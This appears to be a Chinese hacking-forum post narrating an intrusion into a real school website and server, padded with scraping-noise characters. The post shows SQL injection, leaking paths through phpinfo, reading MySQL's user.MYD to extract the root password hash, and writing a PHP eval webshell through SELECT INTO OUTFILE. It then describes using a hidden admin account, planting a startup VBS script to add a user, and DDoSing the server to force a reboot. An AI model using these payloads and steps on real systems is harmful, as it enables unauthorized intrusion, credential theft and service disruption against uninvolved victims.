第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
- `! T7 y) C6 L3 Y; y发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!, k! S* U7 K9 I: e
; |, F4 A% N! d0 v; N/ q8 n: u0 }% q
' c' B0 a# X: Y5 Z: P
& q9 v& y! {4 ^$ l* o$ ~
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
" V4 d5 [! g6 Y; t- f- M- j/ `2 |) A/ W) l( R5 {
那么想可以直接写入shell ,getshell有几个条件:
7 X% p0 i9 W' t% ]1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF W' [ H" y4 i0 M
. d" W, e6 j8 w0 E$ r$ }试着爆绝对路径: / e9 s2 u/ F) R- d: b
1./phpMyAdmin/index.php?lang[]=1 + I/ E8 v+ Z+ r3 \
2./phpMyAdmin/phpinfo.php
! D! \/ \2 s6 d1 X0 z3./load_file()
" v+ R4 ~& ?" t& l4./phpmyadmin/themes/darkblue_orange/layout.inc.php
4 `# }0 s% ^+ g5./phpmyadmin/libraries/select_lang.lib.php * W2 k! R' Q9 f
6./phpmyadmin/libraries/lect_lang.lib.php
7 t& I0 J& G7 f% U7./phpmyadmin/libraries/mcrypt.lib.php
1 e. z* u% S. n" c8./phpmyadmin/libraries/export/xls.php
1 L& t0 Q6 k3 q( E! U' Q) r% [% d7 T* Z! L
均不行...........................
0 {$ r8 P8 D8 K2 ~" J: h, j: C( G& j) p! w, V$ v) j
御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
1 F) h4 ~3 \6 ?' ~$ r! I
# S- h! s' X0 o z权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
4 \3 a2 T! n# _: C0 U5 `- f5 S% h$ E7 T
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败 9 U T' o* H9 \# t; y
1 T3 v, Y1 x- f ^
敏感东西: http://202.103.49.66/Admincp.php 社工进不去...........
5 ^- T2 [+ F; w) V1 R% Z: `3 z" j+ _4 A. c
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
/ H+ V! w. E5 A0 I8 y7 c
: G* F! R# r( C0 s3 q7 shttp://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini
% m, c+ \2 E+ o$ ]/ |# ^6 m8 h. e9 c5 l2 V8 o U" B" @% d
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD 5 Y6 K1 U5 U# [0 D4 `0 C
) L& U4 s# d/ [' }) g
成功读到root密码: 3 h5 H+ _: u9 z7 f
- k9 l3 K$ q! s9 X7 i17---- r(0072) ' j) t- V! E+ S0 X
18---- o(006f) : e# E' u2 Z4 N! o6 ^
19---- o(006f) ' J) D* I4 t5 a; ]
20---- t(0074)
/ z" }4 A$ m$ p6 l' h21---- *(002a) * Q# T% B' o" s0 A6 A. M
22---- 8(0038) & ], e' u; g% K) ]2 s
23---- 2(0032)
6 B- `) l- \( j0 z5 x5 j) ]5 ]7 j24---- E(0045) 4 U) _4 P9 Y! w9 m* L( L% R
25---- 1(0031)
6 G5 a4 l' ]( S1 Y- j9 @26---- C(0043)
* S6 u& `2 S3 i27---- 5(0035)
: K" g( u' @+ z# z9 c28---- 8(0038) , e* c; \9 V+ l; |. O
29---- 2(0032) # l {6 R; P4 H5 U
30---- 8(0038)
# Q3 ?( V# U/ y. c, l8 x3 X1 l31---- A(0041)
5 h' A* u4 W8 g32---- 9(0039)
/ ]% I- M$ U$ Z. W( V( e/ A, S) U33---- B(0042)
& E, Z; T' c3 |2 t7 V( U; ]34---- 5(0035) & z: N# F. V, C% e9 ]! ]
35---- 4(0034)
+ x7 P5 r3 K, G36---- 8(0038) 1 H# m* w2 O3 {. M
37---- 6(0036) % H4 J# W8 s! ~/ C2 ~8 }/ M
38---- 4(0034)
7 p4 P) O# c% `- W) k8 \1 U39---- 9(0039)
3 M( Q9 A, c. ]4 C1 a40---- 1(0031)
" c M3 {6 \5 R" @41---- 1(0031) ) Y y" t8 m" A; i
42---- 5(0035)
8 V- r7 ^& D1 m9 o+ \3 k5 T43---- 3(0033)
8 w o2 y! ~$ G0 [9 b) j44---- 5(0035) : d0 k5 ]5 |* Q( h
45---- 9(0039)
; T- L1 `* p5 a" A i46---- 8(0038)
# G7 F7 j! H& J& t3 j) D! G47---- F(0046)
. z2 ^: U( t% h, `9 U; U48---- F(0046) $ @/ K; b: b8 y) g
49---- 4(0034) # r9 x0 X+ @+ ^/ g/ `- C# W# F/ O
50---- F(0046) j) a7 V$ G5 ~5 e) p0 u* H
51---- 0(0030)
/ k. k; Q1 ^0 g) }% h& B9 v52---- 3(0033) 1 ~; R( H% Z; }: z9 v
53---- 2(0032) * ~3 D9 Z* z! _& ]
54---- A(0041) 1 T+ D9 w8 V7 O* ] \
55---- 4(0034)
6 K2 I9 b& j9 K, Z [2 n* F56---- A(0041)
/ W* o J4 y# N/ R57---- B(0042) , D" A1 H2 S; Q# ^( T6 ?
58---- *(0044) 9 T! n5 E: Q7 l5 \, }
59---- *(0035)
. B% @- e9 b+ U4 h60---- *(0041) $ [5 a7 b2 n& I
61---- *0032)
3 G7 M, ]- {& [* e8 y
0 |! m- A) }) e+ |, _2 [解密后成功登陆phpmyamin + I( Z8 O! C) v
) q* X. B, Z% t, J+ a2 ^( A
$ G+ i6 \& I+ v" j5 u2 G6 w
* o$ L7 g5 y( u) n
2 Q8 |9 [0 N. }$ ?$ i找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
: K% y2 e/ L; o( x
# s% H! ~; p. G3 s7 m, {0 W5 ~成功执行,拿下shell,菜刀连接: 9 i- H% T( `. V1 i$ ?
$ G' u4 Y# w6 x6 P* u服务器不支持asp,aspx,php提权无果................... . T2 W! J& Y6 q( B) N$ z
, a0 V: l: a5 X! t3 z
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
8 K+ ?4 p8 B. ?' `8 }; _; E服务器上已经有个隐藏帐号了
7 J6 M6 Z' J: F1 F别名 administrators& ` `# e; U- k2 Y# i
注释 管理员对计算机/域有不受限制的完全访问权 4 T' h+ g; N Q$ {7 }! L8 r3 _
成员
$ |' [: o* |. u: g5 I-------------------------------------------------------------------------------! V& r3 X& h3 ^. i ~) g! R
admin& H) H' j- Y$ j+ F6 V
Administrator
* T* v4 L4 a/ m7 lslipper$) e& s+ y7 i8 I4 ? z6 D; W+ e
sqluser% }( e0 \+ p, V7 K/ e
命令成功完成。 * ~' d) d3 x P
& V: b) r: t! E5 V0 J- a9 l- l服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。2 z" z) i v9 ?# a
+ z8 {6 m* V( w# C$ f1 T! Yddos服务器重启,不然就只能坐等服务器重启了..............................., a# b* p( v0 e. H! T* W
& c# X" u$ [; J$ b3 r. W
0 p% a) [% T8 R0 `& T
|